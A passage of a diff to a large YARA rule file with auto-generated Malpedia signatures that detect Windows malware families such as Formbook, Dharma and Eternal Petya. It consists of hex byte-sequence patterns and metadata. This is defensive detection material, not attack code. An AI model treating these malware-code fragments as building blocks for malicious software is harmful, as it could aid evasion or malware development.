+		$sequence_2 = { c20400 55 8bec 83c4fc e8???????? b919000000 bb01000000 }
+		$sequence_3 = { eb15 ff75f4 e8???????? ff75fc e8???????? }
+		$sequence_4 = { 8bc2 c1e80e 83e03f 8a80f6434000 aa 49 7418 }
+		$sequence_5 = { 8a80f6434000 aa 8bc2 c1e814 83e03f }
+		$sequence_6 = { ff75a8 e8???????? c7458405000000 c705????????00000000 }
+		$sequence_7 = { 6a00 e8???????? 55 8bec 8b450c }
+		$sequence_8 = { 8d85d8fdffff 50 68???????? e8???????? 85c0 0f84e2010000 }
+		$sequence_9 = { bb01000000 d3e3 23d8 7421 50 51 }
 
 	condition:
-		7 of them and filesize < 114688
+		7 of them and filesize < 57344
 }
-rule MALPEDIA_Win_Darkrat_Auto : FILE
+rule MALPEDIA_Win_Tclient_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "d801447e-13d8-558d-ac93-3bc625f7fc26"
+		id = "3639f84f-4aec-569c-9a4b-faa8f23f8b5c"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkrat"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.darkrat_auto.yar#L1-L124"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.tclient"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.tclient_auto.yar#L1-L131"
 		license_url = "N/A"
-		logic_hash = "e8461586b168e71b04b888d3fef9b643bcbbe5ebaeef3515951b1dcd9d78d8ef"
+		logic_hash = "27c191c2603bf7d7ea682fd55fb7f07be28d5958dc675e32b4f634f07d524410"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -114205,32 +114397,32 @@ rule MALPEDIA_Win_Darkrat_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b75b8 8b4314 0f43d6 8b7b10 2bc7 8b4dc8 }
-		$sequence_1 = { 85c0 7446 8bd0 b805000000 2bd6 8a0e 8d7601 }
-		$sequence_2 = { 83f801 751f 6a0a 68???????? 8bcb e8???????? }
-		$sequence_3 = { 3bf2 0f8211010000 2bf2 8d45d8 b901000000 3bf1 0f42ce }
-		$sequence_4 = { 85c0 7413 8b4904 8b00 8b4c3938 }
-		$sequence_5 = { ff15???????? 85c0 7445 8bc6 }
-		$sequence_6 = { 57 50 8975fc e8???????? 8bd0 }
-		$sequence_7 = { e8???????? 8b551c 83fa10 72bd 8b4d08 42 8bc1 }
-		$sequence_8 = { 6a00 8945ec ff15???????? 8bd8 85db 7462 }
-		$sequence_9 = { 8b8d68ffffff 8bc2 2bc1 57 3bf8 7731 8d040f }
+		$sequence_0 = { 757b 8b4d10 c701a0010000 8b4d14 c70140000000 eb67 }
+		$sequence_1 = { 03c1 3bc3 0f8fdf010000 8b5df0 0fb6041a 66c1e008 0fb7c8 }
+		$sequence_2 = { e8???????? 8d4598 8bce 50 e8???????? 57 6a01 }
+		$sequence_3 = { 0f85cc010000 8b450c 8b4d9c c1e003 3bc1 7613 83e107 }
+		$sequence_4 = { 85f6 75e3 8bc1 3bd8 740f 8bd1 8bcb }
+		$sequence_5 = { 83f802 7443 83f803 747a bf40ffffff 83ff94 7578 }
+		$sequence_6 = { 2bc7 7417 83e801 742f 83e801 }
+		$sequence_7 = { c645fc04 8d4d94 8b45e0 83c018 50 e8???????? 6800040000 }
+		$sequence_8 = { c21800 b8???????? e8???????? 81ec38040000 53 56 57 }
+		$sequence_9 = { 56 e8???????? 59 59 c70602000000 eb14 83660800 }
 
 	condition:
-		7 of them and filesize < 884736
+		7 of them and filesize < 1063936
 }
-rule MALPEDIA_Win_Whiskerspy_Auto : FILE
+rule MALPEDIA_Win_C0D0So0_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "1f71cc7d-dee3-58c1-b7e7-0db4f27f7b73"
+		id = "bb44345c-7e5d-55a8-a363-6f4dd49ac691"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.whiskerspy"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.whiskerspy_auto.yar#L1-L152"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.c0d0so0"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.c0d0so0_auto.yar#L1-L119"
 		license_url = "N/A"
-		logic_hash = "42f604644f01d6d1eab2ff27df4abe182b18b8311684ef0837061e88ea8bd127"
+		logic_hash = "268a1640f52d336fbac005894a892b3cb4160d26716dda753325e6e4796f541a"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -114244,37 +114436,32 @@ rule MALPEDIA_Win_Whiskerspy_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 33ff 8b06 8bcf d3e8 }
-		$sequence_1 = { b867666666 f7e9 488d5c2430 c1fa02 8bc2 }
-		$sequence_2 = { 884c9c4b 48ffc3 4883fb08 7cd2 0f10442420 }
-		$sequence_3 = { 488d0d26120100 483bc1 746d 488b83e0000000 }
-		$sequence_4 = { 4963cd 488d3409 4c8bc6 488bd7 488bc8 }
-		$sequence_5 = { 4c63c2 4d03c0 498d0c3e 488d557c }
-		$sequence_6 = { 488bd8 4885c0 7511 498bce ff15???????? }
-		$sequence_7 = { 90 488b4c2468 e8???????? 90 8bc3 }
-		$sequence_8 = { 8a85f4f9ffff 8a840df4f9ffff 2c6c 3440 }
-		$sequence_9 = { c685c5f9ffff69 c685c6f9ffff5a c685c7f9ffff60 c685c8f9ffff5d }
-		$sequence_10 = { 2c09 3445 88840dccfeffff 41 83f90a 72e8 }
-		$sequence_11 = { 1b7c240c 8b4130 2918 8b4120 0110 eb23 }
-		$sequence_12 = { eb06 8b4510 8b750c 837f4c00 8945f0 }
-		$sequence_13 = { 3daaaaaa0a 0f84da000000 8d5801 8b4608 2b06 99 }
-		$sequence_14 = { 8b00 8d8d38fcffff 51 50 e8???????? }
+		$sequence_0 = { 85c0 0f84c3000000 03c3 50 }
+		$sequence_1 = { ff15???????? f6450820 0f8520010000 395d08 0f8417010000 }
+		$sequence_2 = { 8b0e 33c0 83e912 57 7411 8a4e04 }
+		$sequence_3 = { 4a 7417 4a 740f 4a }
+		$sequence_4 = { eb62 8d45f4 50 57 8d45fc }
+		$sequence_5 = { 0b4f04 7506 8b00 85c0 75e2 53 }
+		$sequence_6 = { 83c40c 6a64 8d4598 50 33ff }
+		$sequence_7 = { 6a00 ffd6 50 ff15???????? 8bd8 85db 7503 }
+		$sequence_8 = { 83e20f 4a 742f 4a 7427 4a 741f }
+		$sequence_9 = { eb07 8a4901 eb02 8a09 57 }
 
 	condition:
-		7 of them and filesize < 591872
+		7 of them and filesize < 450560
 }
-rule MALPEDIA_Win_Graphical_Neutrino_Auto : FILE
+rule MALPEDIA_Win_No_Justice_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "709b8c7e-3b27-57db-a7ca-ec92842eb964"
+		id = "9c76a62e-45df-5e55-95c7-3fd18c7cd11d"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.graphical_neutrino"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.graphical_neutrino_auto.yar#L1-L120"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.no_justice"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.no_justice_auto.yar#L1-L124"
 		license_url = "N/A"
-		logic_hash = "20fe129c0f852597f7609ecc786913a363ba634ff126dc42ff1c434f04b54173"
+		logic_hash = "27fb4d87fb503a879f5ac0f508a221856b21d7d81edc4c17f436773a20141500"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -114288,32 +114475,32 @@ rule MALPEDIA_Win_Graphical_Neutrino_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 4883ec28 48b8abaaaaaaaaaaaaaa 4889d3 4989cc 4889d6 4829cb }
-		$sequence_1 = { 4889d7 66c703302e f3aa 498d442c02 }
-		$sequence_2 = { 488b8c2488000000 e8???????? 488d8c2458040000 e8???????? 4c89e9 }
-		$sequence_3 = { 42c6442d5aef c6440d5abf c644155abd b800020000 4829d8 }
-		$sequence_4 = { 4889d9 e8???????? 488d842488010000 4889ea 48895c2460 4889c1 }
-		$sequence_5 = { 488b4c2458 e8???????? 4c89e1 e8???????? 4889d9 e8???????? 488b4c2450 }
-		$sequence_6 = { 4889e9 e8???????? 90 4881c4b8010000 5b }
-		$sequence_7 = { 488b8c24b0000000 e8???????? 488b8c2498000000 e8???????? }
-		$sequence_8 = { 4c89f9 e8???????? 488b4c2448 e8???????? 4c89f1 e8???????? 488b4c2438 }
-		$sequence_9 = { 4c8da424c0000000 48c78424c800000002000000 48898424a0000000 4c89e2 48898424c0000000 488d8424e8040000 4889c1 }
+		$sequence_0 = { 8b45b4 8a0a 884c382e 8b45bc 8b048570be4100 804c382d04 }
+		$sequence_1 = { 83e03f c1f906 6bc038 03048d70be4100 }
+		$sequence_2 = { 6bc938 53 56 8b048570be4100 8b7508 57 }
+		$sequence_3 = { 57 8b7d08 e9???????? 8b0f 894dfc 8d048de0c14100 }
+		$sequence_4 = { 8b04bd70be4100 807c182800 7d46 8b750c 807e1400 7507 }
+		$sequence_5 = { 8945f4 8b4514 40 c745ec0a294000 894df8 8945fc 64a100000000 }
+		$sequence_6 = { c3 8b55fc 8bc6 8d0c95e0c14100 8701 85c0 }
+		$sequence_7 = { 8d0c95e0c14100 8701 85c0 7407 56 ff15???????? }
+		$sequence_8 = { 8b048570be4100 8b4ddc f644012801 7517 8b4514 c6401c01 c7401809000000 }
+		$sequence_9 = { 8b049d70be4100 f644072801 7444 837c0718ff 743d e8???????? }
 
 	condition:
-		7 of them and filesize < 674816
+		7 of them and filesize < 253952
 }
-rule MALPEDIA_Win_Eternal_Petya_Auto : FILE
+rule MALPEDIA_Win_Sepulcher_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "5412d86d-0c91-551e-8b1c-043b9779137a"
+		id = "226eeb17-2cf9-5d07-9607-4486b199b293"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.eternal_petya"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.eternal_petya_auto.yar#L1-L164"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sepulcher"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.sepulcher_auto.yar#L1-L127"
 		license_url = "N/A"
-		logic_hash = "3d823703098c3ea98ac24fd4bb7c283e7fba6eebd623c0da8c21f46950e9dc6a"
+		logic_hash = "e1aaa31878ffe75af7745e7155d1b8f026b2d8b5dc07360be87f7b721a2b24ec"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -114327,38 +114514,32 @@ rule MALPEDIA_Win_Eternal_Petya_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 53 6a21 8d460c 50 }
-		$sequence_1 = { 55 8bec 51 57 68000000f0 6a18 33ff }
-		$sequence_2 = { 53 68f0000000 6a40 ff15???????? 8bd8 }
-		$sequence_3 = { 53 8d4644 50 53 }
-		$sequence_4 = { 49 75f7 8b7508 895de4 }
-		$sequence_5 = { 49 75f9 6800400000 56 }
-		$sequence_6 = { 0f86eef9ffff 6afe 58 5f }
-		$sequence_7 = { 49 75f2 8b4364 034360 8b4b68 894dd4 3bc8 }
-		$sequence_8 = { 55 8bec e8???????? 8b4d08 85c9 }
-		$sequence_9 = { 03c8 8bc2 c1e818 03c8 33c0 }
-		$sequence_10 = { 03c8 ff442418 ff442410 89940ca0020000 }
-		$sequence_11 = { 33db 53 ffd7 50 ff15???????? 5f 8bc3 }
-		$sequence_12 = { ffd7 a3???????? ffd6 50 6a00 68???????? 6a02 }
-		$sequence_13 = { 8bc6 5e 5b c21000 b8???????? a3???????? }
-		$sequence_14 = { 8bc6 90 0fb708 66890c03 }
-		$sequence_15 = { 8bc6 c1f805 57 83e61f 8d3c8500cc4400 }
+		$sequence_0 = { fe4123 5d c20800 55 8bec 51 53 }
+		$sequence_1 = { be00001000 eb02 8bf1 81bd28d2ffffee030000 7525 6a00 8d8520d2ffff }
+		$sequence_2 = { 59 33c0 8dbd68ffffff f3ab 8d8568ffffff }
+		$sequence_3 = { 56 53 e8???????? 85c0 743d 6a00 8d8520d2ffff }
+		$sequence_4 = { 50 6a00 8d85e8f9ffff 50 ff15???????? 85c0 }
+		$sequence_5 = { 894db8 8975b4 8945bc 85f6 0f8497000000 85c0 }
+		$sequence_6 = { 6a00 50 e8???????? 83c40c 8d85e0f7ffff 68ff000000 }
+		$sequence_7 = { 59 ebbd 8b470c 8903 05ffff0000 50 e8???????? }
+		$sequence_8 = { e8???????? 59 ff75bc 8bf8 8bce 57 e8???????? }
+		$sequence_9 = { d1e8 894234 8b4a38 0faf4a34 8b4214 }
 
 	condition:
-		7 of them and filesize < 851968
+		7 of them and filesize < 279552
 }
-rule MALPEDIA_Win_Unidentified_045_Auto : FILE
+rule MALPEDIA_Win_Pss_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "76acbb90-4df7-541d-89b1-1533f977dd70"
+		id = "5d7a2f66-332a-5d9c-b5c1-576c5e994461"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_045"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.unidentified_045_auto.yar#L1-L101"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.pss"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.pss_auto.yar#L1-L139"
 		license_url = "N/A"
-		logic_hash = "85ab00021027191936abb42742c680d628a952bd176522618ad1f59b85811c84"
+		logic_hash = "51611bab605bb2ace0ab1fa2af33625cc29dd81f64a8b665b3e9018994b265fd"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -114372,30 +114553,35 @@ rule MALPEDIA_Win_Unidentified_045_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 03480c 894f0c 395808 7517 ff7638 }
-		$sequence_1 = { 53 56 57 be04010000 56 33db 8d85f8fdffff }
-		$sequence_2 = { 5a 32040a 4a 83fa01 }
-		$sequence_3 = { 8d85fcfeffff 50 e8???????? 83f801 74e1 68???????? ff15???????? }
-		$sequence_4 = { 8d75ec e8???????? 85c0 0f8492000000 }
-		$sequence_5 = { 53 ff36 68???????? 53 53 ffd7 }
-		$sequence_6 = { 6a50 ff15???????? 8b3d???????? 8d7520 385d20 }
-		$sequence_7 = { c70083c404e9 8b45fc c740046f92feff 8b45d8 8b400c }
+		$sequence_0 = { 8d48fe e8???????? e9???????? 83f811 }
+		$sequence_1 = { 7437 ff15???????? 3de5030000 752a }
+		$sequence_2 = { ff15???????? 83ceff 3bc6 7504 }
+		$sequence_3 = { 740a 50 ffd6 830d????????ff a1???????? 85c0 740a }
+		$sequence_4 = { 8d85eafdffff 56 50 e8???????? 83c40c }
+		$sequence_5 = { 8d4dc0 e8???????? eb23 8d45a4 }
+		$sequence_6 = { ff15???????? 56 53 8d4c2414 8bf8 }
+		$sequence_7 = { 50 8995a4f9ffff 899da0f9ffff 83cfff e8???????? 6848040000 8d85b0fbffff }
+		$sequence_8 = { 4889442448 488d15f5710100 488d4c2428 e8???????? 90 4c8d050bbe0000 }
+		$sequence_9 = { 488d050cbc0100 488b4c2430 483bc8 7405 }
+		$sequence_10 = { 488bd0 488d0dd96a0100 e8???????? 90 48837c244008 }
+		$sequence_11 = { 0f859d040000 498d4810 498bd8 4c8b09 41386919 7513 }
+		$sequence_12 = { 488bcd 895c2470 e8???????? 48634c2470 4803c9 }
 
 	condition:
-		7 of them and filesize < 73728
+		7 of them and filesize < 421888
 }
-rule MALPEDIA_Win_Formbook_Auto : FILE
+rule MALPEDIA_Win_Dropshot_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "241ced8d-1693-5841-a374-2686d8f6dbd5"
+		id = "8c0e25df-1d9c-5bb9-85ce-2d5bc4ccd180"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.formbook_auto.yar#L1-L128"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dropshot"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.dropshot_auto.yar#L1-L100"
 		license_url = "N/A"
-		logic_hash = "3380fbe26c3100d3b724659437582cb2b4b97057755a8459118372ab9a826cc2"
+		logic_hash = "3f5f25fe800a01f710cc89be583f98653a26f14448d6ba599306a1d4d7c2a368"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -114409,32 +114595,30 @@ rule MALPEDIA_Win_Formbook_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 55 8bec 8b4508 8b480c 56 6a05 51 }
-		$sequence_1 = { c3 6a01 8d8d00fcffff 6a0a 51 e8???????? }
-		$sequence_2 = { 8db4089979825a 8b4df8 8b45fc c1ca02 8bd9 8955fc 8975f8 }
-		$sequence_3 = { 8d8d4cfdffff 51 52 56 e8???????? 83c424 85c0 }
-		$sequence_4 = { c785dcfeffff74005600 c785e0feffff65007200 c785e4feffff73006900 c785e8feffff6f006e00 }
-		$sequence_5 = { 0faf4ef8 83c6ec 83c002 0faf4608 83c014 3bc1 }
-		$sequence_6 = { 8b4510 8955d0 2b4134 83c408 8945cc 8b89a0000000 03cb }
-		$sequence_7 = { 33c0 81ff00000040 0f94c0 5e 5f 5b 8be5 }
-		$sequence_8 = { 898579ffffff 89857dffffff 894581 894585 894589 6689458d 88458f }
-		$sequence_9 = { 8b07 83c414 0345f8 5f 5e 5b }
+		$sequence_0 = { ff15???????? 5d c3 3b0d???????? f27502 f2c3 }
+		$sequence_1 = { e8???????? 83c40c 6a04 6800100000 6804010000 6a00 ff15???????? }
+		$sequence_2 = { 6a64 ff15???????? 6800800000 6a00 }
+		$sequence_3 = { ff15???????? 6a04 6800100000 6808020000 6a00 }
+		$sequence_4 = { eb05 e8???????? 68e8030000 ff15???????? }
+		$sequence_5 = { 6a00 68???????? 6a00 ff15???????? b801000000 }
+		$sequence_6 = { 6a00 ff15???????? 6a05 ff15???????? ff15???????? }
+		$sequence_7 = { 6a00 6a00 ff15???????? 6a00 6a00 68???????? }
 
 	condition:
-		7 of them and filesize < 371712
+		7 of them and filesize < 483328
 }
-rule MALPEDIA_Win_Bunnyloader_Auto : FILE
+rule MALPEDIA_Win_Tapaoux_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "ece611ac-2894-5ce7-8657-b8f35c78c42b"
+		id = "bce56a96-656f-5b7c-a7ef-d9facfa97150"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bunnyloader"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.bunnyloader_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.tapaoux"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.tapaoux_auto.yar#L1-L130"
 		license_url = "N/A"
-		logic_hash = "129a4ff66c7e006295a1adc8f4f2d85689837626bb7a785d4d174a96334a4fa5"
+		logic_hash = "6c80ff6e5416b0acf89a64b88900eb504acb14643be57ceb13e02da18a2fedde"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -114448,32 +114632,32 @@ rule MALPEDIA_Win_Bunnyloader_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ff33 e8???????? 83c408 85c0 7441 85f6 7535 }
-		$sequence_1 = { ff74242c 8bce 52 ba0e000000 e8???????? 83c40c eb7a }
-		$sequence_2 = { c744881000000000 6af8 ff742428 8bcf e8???????? 8b442410 83c408 }
-		$sequence_3 = { ffb564e6ffff ffd6 6800800000 6a00 57 ff15???????? 6804010000 }
-		$sequence_4 = { ff742418 ba87000000 8bce e8???????? 83c40c 8bd0 e9???????? }
-		$sequence_5 = { 8bcf 0fb68394000000 53 50 6aff e8???????? 8bf0 }
-		$sequence_6 = { ff751c 8b4d08 57 56 ff7510 e8???????? 83c414 }
-		$sequence_7 = { 8bda 8945fc 8bd1 8955f8 3907 7e6d 8b4d08 }
-		$sequence_8 = { ff742410 ba35000000 8bce 6a00 ff74242c e8???????? 83c40c }
-		$sequence_9 = { ff75e8 e8???????? ff75e8 8bf0 e8???????? 33c0 83c40c }
+		$sequence_0 = { 33c0 8a06 51 50 4e e8???????? 83c408 }
+		$sequence_1 = { e8???????? 8bd0 83c404 85d2 7503 c21400 53 }
+		$sequence_2 = { 6a04 8d8c241c040000 68???????? 51 e8???????? 83c40c 85c0 }
+		$sequence_3 = { 8bfb 8bf1 55 c1e902 f3ab }
+		$sequence_4 = { e8???????? 8bc5 5d 5f 5e 81c40c080000 c3 }
+		$sequence_5 = { 81ec1c020000 53 56 8bb42428020000 57 85f6 0f8410010000 }
+		$sequence_6 = { 81ec44040000 55 57 b91f000000 33c0 8d7c2409 c644240800 }
+		$sequence_7 = { b91f000000 33c0 8dbc2491000000 889c2490000000 885c2410 f3ab }
+		$sequence_8 = { 8d8424b4000000 83e103 6a01 f3a4 50 8d4c241c e8???????? }
+		$sequence_9 = { 74c5 3bf7 7ccf 5f 5e 5d }
 
 	condition:
-		7 of them and filesize < 2998272
+		7 of them and filesize < 294912
 }
-rule MALPEDIA_Win_Remsec_Strider_Auto : FILE
+rule MALPEDIA_Win_Dharma_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "8ffafd3c-1118-56d9-b912-84b2d6b6409b"
+		id = "a46a081b-90b3-5009-83f4-4508f1cf18af"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.remsec_strider"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.remsec_strider_auto.yar#L1-L121"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dharma"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.dharma_auto.yar#L1-L129"
 		license_url = "N/A"
-		logic_hash = "5867115fb4def3b071a615d256fa1eed563d65b07c2fc4fbbe85633ada999202"
+		logic_hash = "ffbccfb89aae24b9d0cb0290ebb9e2adf2ba122649057e830bafd37778b3a0cb"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -114487,32 +114671,32 @@ rule MALPEDIA_Win_Remsec_Strider_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { c9 c20800 33c0 40 83f920 }
-		$sequence_1 = { 50 8d8558faffff 68c8000000 50 ff15???????? 50 }
-		$sequence_2 = { 85c0 7444 8b4818 85c9 7405 }
-		$sequence_3 = { 57 ff5608 85c0 74a7 33c0 40 }
-		$sequence_4 = { 6a0c 58 c3 83f927 7412 83f950 }
-		$sequence_5 = { 7433 48 742c 48 7413 48 7409 }
-		$sequence_6 = { 50 e8???????? 83c418 8d85ecfeffff 50 ff15???????? }
-		$sequence_7 = { dfe0 ddd9 750a f6c441 }
-		$sequence_8 = { 49 7414 49 7411 49 49 7409 }
-		$sequence_9 = { c20400 56 8bf1 6808040000 8d4614 }
+		$sequence_0 = { 8b4218 33c9 668908 8b5508 }
+		$sequence_1 = { 81e10000ff00 33d1 8b45f0 c1e808 25ff000000 8b0c85b8b34000 81e100ff0000 }
+		$sequence_2 = { 6a08 8b450c 8b4818 51 e8???????? 83c408 2500ff00ff }
+		$sequence_3 = { 51 8b55fc 52 ff15???????? 8b4df8 89048db8864100 8b55f8 }
+		$sequence_4 = { 33c0 6689044a 8b4d08 8b5104 83c201 8955ec 8b4508 }
+		$sequence_5 = { 732e 8b4df8 8a11 8855ef 8b45f8 8b4df4 8a11 }
+		$sequence_6 = { e8???????? 83c410 894590 6a02 6880000000 }
+		$sequence_7 = { 83780800 7405 e8???????? 8b4d0c 51 8b55fc 52 }
+		$sequence_8 = { 2b4224 8d4c0002 51 8b5508 8b4224 8b4d08 8b5118 }
+		$sequence_9 = { 52 8b4510 50 e8???????? 83c408 85c0 7409 }
 
 	condition:
-		7 of them and filesize < 344064
+		7 of them and filesize < 204800
 }
-rule MALPEDIA_Win_Unidentified_091_Auto : FILE
+rule MALPEDIA_Win_Snifula_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "62d0217c-caa8-5a24-836c-be321aa72ae6"
+		id = "7eb0b095-555b-5c46-a556-09b78e129a51"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_091"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.unidentified_091_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.snifula"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.snifula_auto.yar#L1-L131"
 		license_url = "N/A"
-		logic_hash = "5a53bb358b4bf07b18385bcb86f5c0c27f228bb0e297f7cd9c02060943441d31"
+		logic_hash = "8cd858ad508ccf0d5980ca44f29c7ac0d1ef182e09e60747d07a1ef2744ff82a"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -114526,32 +114710,32 @@ rule MALPEDIA_Win_Unidentified_091_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 4d034360 488bd7 48c1ca27 4d03c1 4833d1 4c03c6 4d03e0 }
-		$sequence_1 = { e8???????? e9???????? c7442428f3050000 ba0a000000 41b999010000 e9???????? c7442428d9050000 }
-		$sequence_2 = { e8???????? 8b5340 8910 ff4304 e8???????? 41b800010000 488d55a0 }
-		$sequence_3 = { 85c0 7529 803e2c 7524 ba6b000000 c744242027020000 4c8d0d0cd81100 }
-		$sequence_4 = { bf75000000 b85f000000 ba7b000000 89442420 4c8d0da9621100 448bc7 8d4a93 }
-		$sequence_5 = { c1c007 8945ab 8b45db 4103c1 8bd0 33d6 c1c210 }
-		$sequence_6 = { 723a 488b3b 488bd7 e8???????? 488d5601 4881fa00100000 7218 }
-		$sequence_7 = { c3 53 e40d 00ade40d0048 e40d 00b8e40d0000 0303 }
-		$sequence_8 = { 8d48f0 488d1519641100 e8???????? 4885c0 7526 4c8d0d08641100 c744242025000000 }
-		$sequence_9 = { 83f8ff 7407 4803c0 8954c608 89540d9f 488b75cf 4c8b6dd7 }
+		$sequence_0 = { ff35???????? 89442410 6a01 57 ff15???????? 89442410 3bc7 }
+		$sequence_1 = { 8bf8 3bfe 752f 8d45f8 50 56 ff75fc }
+		$sequence_2 = { 743b ff15???????? 8bf8 68???????? 57 ffd6 59 }
+		$sequence_3 = { 53 33db 56 895dfc 3bfb 0f848b000000 8bc7 }
+		$sequence_4 = { 51 8365fc00 57 8bf8 85ff 7431 }
+		$sequence_5 = { 895dd8 8945dc 33d2 8b4ddc 8d4104 8b09 }
+		$sequence_6 = { e8???????? 8325????????00 5f 56 53 8b5d08 }
+		$sequence_7 = { 68???????? 56 ff15???????? 85c0 7414 56 6a00 }
+		$sequence_8 = { 8b03 e8???????? 8945fc 85c0 750f 394508 750a }
+		$sequence_9 = { ff35???????? ff35???????? 68???????? ff75f4 ffd7 83c42c ff36 }
 
 	condition:
-		7 of them and filesize < 5777408
+		7 of them and filesize < 188416
 }
-rule MALPEDIA_Win_Wslink_Auto : FILE
+rule MALPEDIA_Win_Cur1_Downloader_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "fab4adfe-31ab-528e-91bb-69ff368202dc"
+		id = "8f21da40-d974-5099-af6e-31cd89e26953"
 		date = "2024-10-31"
 		modified = "2024-11-11"
